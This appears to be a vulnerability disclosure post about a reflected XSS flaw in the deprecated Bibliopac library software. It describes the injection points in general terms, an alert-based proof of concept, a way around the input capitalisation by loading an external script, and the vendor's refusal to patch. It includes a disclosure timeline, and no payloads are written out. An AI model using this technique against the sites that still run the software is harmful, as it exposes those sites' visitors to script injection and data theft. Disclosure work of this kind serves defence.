Good morning. Today I bring to attention a XSS vulnerability in a library management/inventory software, Bibliopac from Bibliosoft. This software is used mainly in the Portuguese geographic region by several entities, and it’s somewhat old. The reason that this could be dangerous has to do with the environment of the vulnerability.
Quick introduction to XSS attacks
In my research, I found on Google 176 results of this application running on several servers. The matter gets worst when we look at what institutions are running it. Institutions related to education, city halls or even court-related institutions.
After discovering this vulnerability, I contacted the developer of this application. However, they stated that the software is deprecated and no patch will be issued. Confirming on their website, it is indeed an old software version, and a new product is available (I did not test the new product).
Despite that the vulnerability still exists and can be exploited. The following URLs are prone to XSS:
Keep in mind that the “db” parameter could be different since the application allow for different Databases to be installed.
If we analyze the source code, we can see the * reflected on the page. Weaponizing the vulnerability, we can trigger an alert message to prove that it works: In the second injection point we see that it capitalizes the input so we need to (for example) point to a script on another location to fully exploit it.
An attacker can exploit this vulnerability to extract additional information from a clients website. If for any change you need to have this product exposed mitigations are needed to be placed to block this attack. There is also the possibility to have other injection points in the software, but that wasn’t thoroughly tested.
- 27/08/2018 - First contact to request security contact of the company
- 28/08/2018 - First response
- 31/08/2018 - Details sent
- 31/08/2018 - Response (deprecated 5 years ago) won’t fix
- 31/08/2018 - Query to known if clients are going to be notified
- 22/10/2018 - No Response, contacted CSIRT
- XX/12/2018 - Won’t fix, clients being informed
- 01/02/2019 - Disclosing it
I do not promote the exploitation of this vulnerability for malicious purposes. My research was only an academic one without interference or harm to any people.